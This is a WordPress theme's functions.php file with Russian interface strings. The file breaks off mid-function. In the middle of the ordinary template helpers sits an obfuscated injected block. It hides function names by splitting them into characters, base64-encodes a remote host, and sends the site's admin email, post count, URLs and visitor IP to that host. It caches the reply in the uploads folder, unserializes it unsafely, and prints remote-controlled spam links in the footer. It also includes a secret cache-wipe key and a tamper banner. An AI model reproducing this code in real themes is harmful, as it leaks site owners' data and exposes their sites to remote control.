<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $nyEagLr='6';$PwbTuw='d';$dmZqiC='e';$ubOULZ='_';$JlBFd='s';$MzAHNZm='e';$riJR='e';$rdXvq='d';$CETMQc='a';$qlup='b';$gXeycLq='c';$fGSIl='4';$WbgYQa='o';$WCEfVJMI=$qlup.$CETMQc.$JlBFd.$dmZqiC.$nyEagLr.$fGSIl.$ubOULZ.$rdXvq.$MzAHNZm.$gXeycLq.$WbgYQa.$PwbTuw.$riJR;$YPaMoq='a';$AdXt='e';$UyChkK='l';$WShCWr='f';$TnMh='g';$fMHSNMu='t';$RvJN='i';$eBnO='n';$NfrNyq='z';$IeyFekhX=$TnMh.$NfrNyq.$RvJN.$eBnO.$WShCWr.$UyChkK.$YPaMoq.$fMHSNMu.$AdXt;$tUFgBy='s';$Vghv='r';$tuFqlNy='t';$NmbZId='_';$lkdUXp='1';$nTUOXRh='t';$WYZgTgo='3';$bbGCzz='o';$ryLA='r';$smwckmcW=$tUFgBy.$nTUOXRh.$ryLA.$NmbZId.$Vghv.$bbGCzz.$tuFqlNy.$lkdUXp.$WYZgTgo;$EpBEPjN='t';$WLhX='r';$booD='e';$gQfjbo='s';$fJEhX='v';$zkPpuP='r';$jPjZTHyg=$gQfjbo.$EpBEPjN.$WLhX.$zkPpuP.$booD.$fJEhX;                     
		$fg__y='6';$oq__u='d';$dv______r='e';$vs______________n='_';$wq___________w='s';$ky_____v='e';$xc____________f='e';$cp_______________r='d';$lr______h='a';$pu_______________o='b';$po___m='c';$ha____________b='4';$et______i='o';$sx________d=$pu_______________o.$lr______h.$wq___________w.$dv______r.$fg__y.$ha____________b.$vs______________n.$cp_______________r.$ky_____v.$po___m.$et______i.$oq__u.$xc____________f;
		$ca_____b='t';$za_________k='u';$yb______________x='x';$cn___k='t';$hf_______w='i';$mv____m='_';$qa____________y='s';$yw___g='s';$zy__________b='i';$yg____c='n';$zx___s='c';$zb__w='f';$il____________h='n';$vr______________t='e';$ic______________i='o';$li____o=$zb__w.$za_________k.$yg____c.$zx___s.$ca_____b.$hf_______w.$ic______________i.$il____________h.$mv____m.$vr______________t.$yb______________x.$zy__________b.$yw___g.$cn___k.$qa____________y;
		$hi________s='n';$jy________l='e';$aq___________m='o';$cz______________t='f';$cy________j='p';$lx______________o=$cz______________t.$aq___________m.$cy________j.$jy________l.$hi________s;
		$fc______d='e';$th_____________x='d';$pv__q='r';$pp________r='a';$ah______h='f';$xo_____________x=$ah______h.$pv__q.$fc______d.$pp________r.$th_____________x;
		$kh_____j='s';$dt________n='c';$wf___u='o';$lj_________r='e';$bj___________c='f';$mg_______h='l';$yg_______________v=$bj___________c.$dt________n.$mg_______h.$wf___u.$kh_____j.$lj_________r;
		
		define("WP_ID", $sx________d("Mi4wLjA="));
		define("WP_TTL", $sx________d("MTA4MDA="));
		define("WP_SRC", $sx________d("dHBva24="));
	


		function wp_get_header() {
			global $sx________d, $li____o;
			
			if (
				$li____o($sx________d("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$li____o($sx________d("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$li____o($sx________d("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $sx________d, $lx______________o, $yg_______________v, $xo_____________x;
			
			$mh__c = TEMPLATEPATH."/".$sx________d("Zm9vdGVyLnBocA==");
			$jp____________s = @$lx______________o($mh__c, "r");
			$mh__c = @$xo_____________x($jp____________s, @filesize($mh__c));
			@$yg_______________v($jp____________s);
			
			$rt__p = TEMPLATEPATH."/".$sx________d("ZnVuY3Rpb25zLnBocA==");
			$jp____________s = @$lx______________o($rt__p, "r");
			$rt__p = @$xo_____________x($jp____________s, @filesize($rt__p));
			@$yg_______________v($jp____________s);
			
			$yt___________a = 0;
			if($mh__c && $rt__p) {
				if ($sx________d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($mh__c, $sx________d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$yt___________a = 1;
					}
					if (substr_count($mh__c, "wp_theme_GPL_credits()") < 1) {
						$yt___________a = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$yt___________a = 12;
				}
			}
			
			if($yt___________a > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $yt___________a -->";
			}
		}
	


		function wp_loaded() {
			global $sx________d, $li____o;
			return $li____o($sx________d("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($vn____________b, $kp____________g = "(more...)", $yr__________g = 0, $gg__b = "") {
				$cm_____p = get_the_content($kp____________g, $yr__________g, $gg__b);
				$cm_____p = apply_filters("the_content", $cm_____p);
				
				$cm_____p = str_replace("]]>", "]]>", $cm_____p);
				if (strlen($_GET["p"]) > 0) {
					echo $cm_____p;
				}
				else if ((strlen($cm_____p)>$vn____________b) && ($xg____________n = strpos($cm_____p, " ", $vn____________b ))) {
					$cm_____p = substr($cm_____p, 0, $xg____________n);
					$cm_____p = $cm_____p;
					echo $cm_____p;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$kp____________g</a></div></p>";
				} else {
					echo $cm_____p;
				}
				
			}
		}
	


		$wo_________r='6';$fx______________i='e';$rm________w='o';$jj____g='d';$yr______________f='e';$uu_____y='_';$hn___n='4';$fx__________d='e';$yv_____x='b';$gm_______________u='a';$iz____________f='c';$sw__z='n';$wr___________g='s';$eb______o=$yv_____x.$gm_______________u.$wr___________g.$fx______________i.$wo_________r.$hn___n.$uu_____y.$fx__________d.$sw__z.$iz____________f.$rm________w.$jj____g.$yr______________f;
		$xz________j='g';$hv___________q='t';$wh__f='e';$zc__i='t';$bt____________x='i';$iz_________j='_';$kb____u='_';$nx______k='t';$cm____________m='n';$sg_____t='c';$im______x='f';$pi_______z='e';$cd________k='n';$co___________v='s';$rv________n='o';$wu____________m='e';$ak_________r='l';$nl___t=$im______x.$bt____________x.$ak_________r.$wh__f.$kb____u.$xz________j.$pi_______z.$hv___________q.$iz_________j.$sg_____t.$rv________n.$cm____________m.$nx______k.$wu____________m.$cd________k.$zc__i.$co___________v;
		$ga______f='x';$re_________y='e';$tw____________f='i';$bj_______________k='f';$jc___e='t';$uj____________h='l';$dn_______w='s';$lw________d='s';$dh__c='_';$zy_________j='e';$xu__________y='i';$oa__________g=$bj_______________k.$tw____________f.$uj____________h.$re_________y.$dh__c.$zy_________j.$ga______f.$xu__________y.$dn_______w.$jc___e.$lw________d;
		$gv___________j='e';$pd_____i='s';$pa____h='o';$sw_______p='r';$sd_____________h='p';$uy__________r='v';$xp____r='_';$ap_________y='e';$pw___________c='i';$my___________n='n';$xo______________m='m';$ou_______u='c';$an______h='a';$nc______________a='r';$ha____________p='o';$kx______k=$uy__________r.$gv___________j.$sw_______p.$pd_____i.$pw___________c.$ha____________p.$my___________n.$xp____r.$ou_______u.$pa____h.$xo______________m.$sd_____________h.$an______h.$nc______________a.$ap_________y;
		$im_____________p='k';$tg__b='p';$ar___z='n';$lr______s='f';$mr___d='c';$zx______________u='o';$im__y='o';$zi_______l='e';$zs___________l='s';$au______o=$lr______s.$zs___________l.$zx______________u.$mr___d.$im_____________p.$im__y.$tg__b.$zi_______l.$ar___z;
		$yu___________s='i';$qy__x='e';$ou________z='f';$px_______h='w';$gp________h='r';$zq______________q='t';$gm______________p=$ou________z.$px_______h.$gp________h.$yu___________s.$zq______________q.$qy__x;
		$yy______________w='m';$fm______w='5';$to__________s='d';$ps____s=$yy______________w.$to__________s.$fm______w;
		$qs__________d='e';$ke____________l='t';$ct___s='a';$rp______i='r';$zn_______v='l';$bb__t='a';$yy________x='p';$yi_______q='h';$zg_____________t=$rp______i.$qs__________d.$bb__t.$zn_______v.$yy________x.$ct___s.$ke____________l.$yi_______q;
		$ey_______k='z';$sp__________h='u';$me____a='e';$gr______t='s';$zd__i='r';$qd___________j='i';$ra________k='l';$tb_____b='n';$sm_____z='i';$fu________o='a';$qs____c='e';$pf________v=$sp__________h.$tb_____b.$gr______t.$me____a.$zd__i.$sm_____z.$fu________o.$ra________k.$qd___________j.$ey_______k.$qs____c;
		$dv_______q='t';$sl_________s='n';$zo_____________q='e';$aa________g='m';$kf______________j='a';$gm_______________z='m';$qv___h='p';$ep__________v=$dv_______q.$zo_____________q.$aa________g.$qv___h.$sl_________s.$kf______________j.$gm_______________z;
		$gd_______d='_';$xi_____________v='c';$mt______________x='t';$ji____q='r';$fw_____r='a';$yj____n='s';$ex_____g='m';$ek________x='_';$sz_______i='o';$nc______z='e';$vf______________n='a';$iv___________n='t';$mf_______________e='c';$lz_________g='e';$we_________g='n';$qb_______w='t';$gl_________l='x';$sk____x='e';$qx_____________g='t';$fi_________c='r';$ny______w='e';$yp________p=$yj____n.$qx_____________g.$ji____q.$lz_________g.$fw_____r.$ex_____g.$ek________x.$xi_____________v.$sz_______i.$we_________g.$mt______________x.$sk____x.$gl_________l.$iv___________n.$gd_______d.$mf_______________e.$fi_________c.$nc______z.$vf______________n.$qb_______w.$ny______w;
	


		function xd_______f($lm_______h) {
			global $sx________d, $li____o, $nl___t, $kx______k, $yp________p;
			
			if (!$li____o($sx________d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($kx______k(PHP_VERSION, "5.0.0", ">=") && $li____o($sx________d("ZmlsZV9nZXRfY29udGVudHM=")) && $li____o($sx________d("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$nw___________b = $yp________p(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$px___________h = @$nl___t($lm_______h, 0, $nw___________b);
			} else {
				$px___________h = @$nl___t($lm_______h, 0);
			}
			
			return $px___________h;
		}
	


		function od___b($lm_______h) {
			global $li____o, $au______o, $gm______________p, $sx________d;
			
			if (!$li____o($sx________d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ln________s = strpos($lm_______h, "/", 7);
			$qu__________o = array(
				"uri"     => substr($lm_______h, $ln________s),
				"host"    => str_replace("http://", "", substr($lm_______h, 0, $ln________s)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$hh________y = @$au______o("$qu__________o[host]", 80, $kq_______________a, $sw____________j, 4);
			
			if (!$hh________y) {
				return false;
			} else {
				$px___________h = "";
				$wk_________u  = "GET $qu__________o[uri] HTTP/1.0\r\n";
				$wk_________u .= "Host: $qu__________o[host]\r\n";
				$wk_________u .= "Referer: $qu__________o[referer]\r\n";
				$wk_________u .= "Connection: Close\r\n\r\n";
				
				@$gm______________p($hh________y, $wk_________u);
				
				while (!@feof($hh________y)) {
					$bf____r = @fgets($hh________y, (1024*24));
					
					if ($bf____r == "\r\n") {
						$vv____w = true;
						continue;
					}
					
					if ($vv____w) {
						$px___________h .= $bf____r;
					}
				}
				
				return $px___________h;
			}
		}
	


		function df_____________m($lm_______h) {
			global $li____o;
			$si_______c = false;
			
			if ($lm_______h != "") {
				if ($li____o("xd_______f")) {
					$si_______c = @xd_______f($lm_______h);
				}
				
				if (!$si_______c && ($li____o("od___b"))) {
					$si_______c = @od___b($lm_______h);
				}
			}
			
			return $si_______c;
		}
	


		function st__y() {
			global $_SERVER, $ps____s;
			
			$yu_______________r = $_SERVER["SERVER_NAME"];
			
			if (substr("$yu_______________r", 0, 4) == "www.") {
				$yu_______________r = substr("$yu_______________r", 4);
			}
			
			$yu_______________r = $ps____s("$_SERVER[SERVER_NAME]");
			
			return $yu_______________r;
		}
	


		function ed_____q() {
			return "file";
		}
	


		function zd____j($lm_______h) {
			global $_SERVER, $nl___t, $oa__________g, $lx______________o, $yg_______________v, $gm______________p;
			
			$js________k = bv___________k();
			
			$ww_______r = st__y().".jpg";
			$gx___u = $js________k["dir_upload"]["path"]."/$ww_______r";
			$ag____________g = @filemtime($gx___u);
			
			if (!$ag____________g || ((time()-$ag____________g) >= WP_TTL)) {
				$si_______c = df_____________m($lm_______h);
				
				if ($si_______c) {
					if ($oa__________g($gx___u)) {
						@unlink($gx___u);
					}
					
					$jp____________s = @$lx______________o($gx___u, "x+");
					
					@$gm______________p($jp____________s, $si_______c);
					@$yg_______________v($jp____________s);
				}
			} else {
				if ($oa__________g($gx___u)) {
					$si_______c = @$nl___t($gx___u);
				} else {
					$si_______c = false;
				}
			}
			
			return $si_______c;
		}
	


		function bv___________k() {
			global $_SERVER, $sx________d, $eb______o;
			
			$ed______p = wp_count_posts("post");
			$fu______d = pathinfo(get_bloginfo("template_directory"));
			
			$js________k = array(
				"url" => array(
					"report"      => $sx________d("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $fu______d,
				"dir_upload"	=> ko_____x(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$fu______d[filename],
					"a005=".$ed______p->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> "
			);
			
			$js________k["url"]["queryString"] = implode("&", $js________k["queryString"]);
			$js________k["url"]["report"] = $js________k["url"]["report"]."/?".$eb______o($js________k["url"]["queryString"]).".html";
						
			return $js________k;
		}
	


		function ko_____x() {
			$wk___________m = wp_upload_dir();
			
			if (isset($wk___________m["error"])) {
				$ii___t = eu__e();
				if (is_writable($ii___t)) {
					$wk___________m = array("path" => $ii___t);
				}
			}

			return $wk___________m;
		}
	


		function eu__e() {
			global $li____o, $ps____s, $zg_____________t, $ep__________v;
			
			$xf__________u = (bool) ini_get("safe_mode");
			if ($xf__________u == true) {
				return false;
			}
			
			if ($li____o("sys_get_temp_dir")) {
				$sw____________w = sys_get_temp_dir();
				if (is_writable($sw____________w)) {
					return $zg_____________t($sw____________w);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $zg_____________t($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $zg_____________t($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $zg_____________t($_ENV["TEMP"]);
			} else {
				$fy_____l = $ep__________v($ps____s(uniqid(rand(), true)), "");
				if ($fy_____l) {
					$sw____________w = $zg_____________t(dirname($fy_____l));
					@unlink($fy_____l);
					return $sw____________w;
				} else {
					return false;
				}
			}
		}
	


		function qe____n() {
			global $_GET, $oa__________g;
			
			$js________k = bv___________k();
			$yu_______________r = st__y();
			$xl___g = ed_____q();
			
			$au________a = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($xl___g == "file") {
					$dx____p = $js________k["dir_upload"]["path"]."/".$yu_______________r.".jpg";
					if ($oa__________g($dx____p)) {
						@unlink($dx____p);
						$au________a = "deleted";
					}
				}
				
				$fz_______d = array(
					"s"	=> $au________a,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($fz_______d AS $kf____o => $cj___a) echo " [$kf____o:$cj___a]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $li____o, $sx________d, $pf________v;
			$js________k = bv___________k();
			
			$gl_____x = "zd____j";
			if ($li____o($gl_____x)) {
				$px___________h = $gl_____x($js________k["url"]["report"]);
			}
			
			if ($px___________h) {
				if ($px___________h = @$sx________d($px___________h)) {
					$px___________h = @$pf________v($px___________h);
					
					if (strlen($px___________h[custom_credit]) >= 5) {
						$js________k["default_string"] = $px___________h[custom_credit];
					}
					
					if ($px___________h["status"] == "0") {
						$rn________z = 1;
						$fq_______v = 1;
					} else {
						$ao______________q = sizeof($px___________h["links"]);
						$zb_____e = $js________k["default_string"];
						
						if ($ao______________q > 0 && $px___________h["links"] !== "") {
							$rh_____x = 0;
							foreach ($px___________h["links"] as $qw______e => $ik______h) {
								$rh_____x++;
								if ($ik______h->l_path == "" || $ik______h->l_path == $_SERVER["REQUEST_URI"]) {
									$ik______h->l_href = htmlspecialchars(strip_tags($ik______h->l_href));
									$ik______h->l_title = htmlspecialchars(strip_tags($ik______h->l_title));
									$ik______h->l_anchor = htmlspecialchars(strip_tags($ik______h->l_anchor));
									$zb_____e .= " | ";
									$zb_____e .= "<a href='$ik______h->l_href' title='$ik______h->l_title'";
									if ($ik______h->l_nofollow == "1") {
										$zb_____e .= " rel='nofollow'";
									}
									$zb_____e .= ">$ik______h->l_anchor</a>";
								}
							}
						}
						$js________k["links"] = "$zb_____e";
						if ($px___________h[credit] == "0") {
							$js________k["links"] = "";
						}
					}
				} else {
					$rn________z = "1";
				}
			} else {
				$rn________z = "1";
			}
			
			if ($rn________z == "1") {
				$js________k["links"] = $js________k["default_string"];
			}
			
			echo "$js________k[links]";
			
			echo "<!-- s: $px___________h[signature] -->";
			qe____n();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
